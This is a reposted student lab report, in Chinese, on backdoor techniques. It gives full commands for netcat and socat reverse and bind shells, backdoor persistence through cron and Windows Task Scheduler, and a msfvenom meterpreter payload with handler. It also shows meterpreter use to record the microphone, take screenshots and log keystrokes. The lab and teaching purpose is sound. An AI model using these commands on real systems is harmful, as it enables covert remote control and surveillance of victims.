加入收藏 | 设为首页 | 会员中心 | 我要投稿 李大同 (https://www.lidatong.com.cn/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 综合聚焦 > 服务器 > Windows > 正文

2018-2019-2 20165313 Exp2 后门原理与实践

发布时间:2020-12-14 02:22:28 所属栏目:Windows 来源:网络整理
导读:实践基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 应用程序设定后门,用户安装后,后门就可以进入。例如课堂上讲到的百度。 (2)例举你知道的后门如何启动起来(win及linux)的方式? win中的后门伴随软件启动 linux可以用corn启动 (3)Me

实践基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

应用程序设定后门,用户安装后,后门就可以进入。例如课堂上讲到的百度。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

win中的后门伴随软件启动
linux可以用corn启动

(3)Meterpreter有哪些给你映像深刻的功能?

可以获取他人的语音录音和视屏,还可以获取他人操作系统权限。

(4)如何发现自己有系统有没有被安装后门?

杀毒软件查杀。

试验过程

课堂上试验:

实践过程:

(1)查看win7和kali的ip:



(2)进入ncat.exe目录下运行ncat.exe -l -p 5313
(3)反向链接:nc 192.168.43.65313 -e /bin/sh


(4)kali输入nc -l -p 5313
(5)Windows反弹连接Linux:``` ncat.exe -e cmd.exe 192.168.43.56 5313

任务一:使用netcat获取主机操作Shell,cron启动

实践过程:

(1)Windows输入指令ncat.exe -l -p 5313 监听
(2)Linux输入指令crontab -e,选择3打开,在最后一行添加代码:53 * * * * /bin/netcat 192.168.1.185 5313 -e /bin/sh 在每小时的53分运行ncat回连win主机



(输入保存完成后,可以通过crontab -l来查看)

(3)时间到了,就可以运行Linux shell指令:

任务二:使用socat获取主机操作Shell,任务计划启动

实践过程:

(1)打开Windows->控制面板->系统和安全->管理工具->任务计划程序:


(2)新建任务计划,填写任务名称
(3)新建触发器,设置为工作站锁定时,并启用:


(4)新建操作,在程序或脚本中选择所下载的socat.exe文件路径,在添加参数中添加tcp-listen:5313 exec:cmd.exe,pty,stderr命令


(5)运行创建任务,在linux中输入指令socat - tcp:192.168.1.185:5313

任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

实践过程:

(1)在Linux主机输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.56 LPORT=5313 -f exe > 20165313_backdoor.exe,此条指令意为生成一个.exe程序,名称为 20165313_backdoor,将来在windows上运行时会回连到Linux主机相应端口


(2)在cmd中输入指令ncat.exe -l 5313 > 5313_backdoor.exe回车准备接收文件:


(3)在kali中输入指令nc 192.168.43.6 5313 < 20165313_backdoor.exe发送文件:


(4)输入msfconsole启动
(5)依次输入use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.43.56
set LPORT 5313
输入show options查看:


任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

实践过程:

(1)Linux输入指令exploit 开始监听
(2)windows 双击后门程序执行。
(3)输入指令record_mic 录制一段音频


(4)webcam_list查看目标主机是否有摄像头


(5)输入指令screenshot 截取屏幕

(6)输入指令keyscan_start记录击键内容,输入指令keyscan_dump 获取击键记录

(7)输入指令getsystem提权失败

实验总结与体会

通过后门进行的攻击更加隐蔽,也更加难以防御,所以只有真正了解其原理,才能找出对应的防御方法。

(编辑:李大同)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

    推荐文章
      热点阅读